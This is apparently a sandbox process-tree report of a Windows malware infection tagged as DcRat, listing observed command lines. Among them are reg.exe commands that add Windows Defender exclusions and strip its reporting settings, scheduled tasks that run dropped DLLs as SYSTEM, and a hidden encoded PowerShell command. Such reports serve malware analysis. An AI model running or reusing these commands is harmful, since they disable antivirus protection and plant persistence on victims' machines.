C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BpmXCGkSTNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BpmXCGkSTNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KYhAKHECtWIvC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KYhAKHECtWIvC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJGvZSUioXRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJGvZSUioXRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wrndFtifU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wrndFtifU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIYCBlCeAeRQzmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIYCBlCeAeRQzmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KYhAKHECtWIvC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KYhAKHECtWIvC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJGvZSUioXRU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJGvZSUioXRU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wrndFtifU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wrndFtifU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIYCBlCeAeRQzmVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIYCBlCeAeRQzmVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UAGVHuYmYMGQZIzG /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UAGVHuYmYMGQZIzG /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggWTweTpf" /SC once /ST 09:29:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggWTweTpf"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggWTweTpf"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hEOVRvlnWpJzMGvLw" /SC once /ST 05:17:32 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\rzvYmtl.exe\" cs /site_id 525403 /S" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hEOVRvlnWpJzMGvLw"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\rzvYmtl.exeC:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\rzvYmtl.exe cs /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bfPiLOEoMHGtOUUyTU"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wrndFtifU\XQfzDi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "CMIDffFQijmeSZd" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CMIDffFQijmeSZd2" /F /xml "C:\Program Files (x86)\wrndFtifU\TBjOTvS.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "CMIDffFQijmeSZd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CMIDffFQijmeSZd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FHrhfHAbDMoVgn" /F /xml "C:\Program Files (x86)\sJGvZSUioXRU2\KVtMaGt.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vGyDUozQLYzyN2" /F /xml "C:\ProgramData\LIYCBlCeAeRQzmVB\YpvKEGl.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LqDpKNkcwALTGagBI2" /F /xml "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\nAnBVAn.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "admxdtfLtextKFmXkQj2" /F /xml "C:\Program Files (x86)\KYhAKHECtWIvC\mGVnrQG.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tzhoEZPqxAOMgijXP" /SC once /ST 09:13:09 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\rEnyFoox\dgHuaOh.dll\",#1 /site_id 525403" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tzhoEZPqxAOMgijXP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MavjK1" /SC once /ST 08:46:04 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MavjK1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MavjK1"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hEOVRvlnWpJzMGvLw"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UAGVHuYmYMGQZIzG\rEnyFoox\dgHuaOh.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UAGVHuYmYMGQZIzG\rEnyFoox\dgHuaOh.dll",#1 /site_id 5254032⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tzhoEZPqxAOMgijXP"3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="12184.0.937533302\1689960489" -parentBuildID 20200403170909 -prefsHandle 1544 -prefMapHandle 1536 -prefsLen 1 -prefMapSize 222368 -appdir "C:\Program Files\Mozilla Firefox\browser" - 12184 "\\.\pipe\gecko-crash-server-pipe.12184" 1628 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="12184.3.2044719799\708114637" -childID 1 -isForBrowser -prefsHandle 2544 -prefMapHandle 2540 -prefsLen 1411 -prefMapSize 222368 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 12184 "\\.\pipe\gecko-crash-server-pipe.12184" 2556 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="12184.13.1571374948\426502973" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 7503 -prefMapSize 222368 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 12184 "\\.\pipe\gecko-crash-server-pipe.12184" 2240 tab3⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"1⤵
- Modifies system executable filetype association
- Registers COM server for autorun
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
C:\Users\Admin\AppData\Roaming\gjttufcC:\Users\Admin\AppData\Roaming\gjttufc1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:?launchContext1=Microsoft.Windows.Cortana_cw5n1h2txyewy&url=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3D%2A.eemv%26form%3DWNSGPH%26qs%3DSW%26cvid%3D2afc4a549bcd475c91f99380042166a3%26pq%3D%2A.eemv%26cc%3DUS%26setlang%3Den-US%26nclid%3D9C0DA10A27A69B5F4DC9FC093B60234D%26ts%3D1663239466602%26nclidts%3D1663239466%26tsms%3D6021⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x118,0x128,0x7ffbdb5146f8,0x7ffbdb514708,0x7ffbdb5147182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7ec625460,0x7ff7ec625470,0x7ff7ec6254803⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5088 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=328 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,6140237137908959288,8804375328742598375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1548 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\SearchIndexer.exeC:\Windows\system32\SearchIndexer.exe /Embedding1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SearchProtocolHost.exe"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SearchFilterHost.exe"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 7842⤵
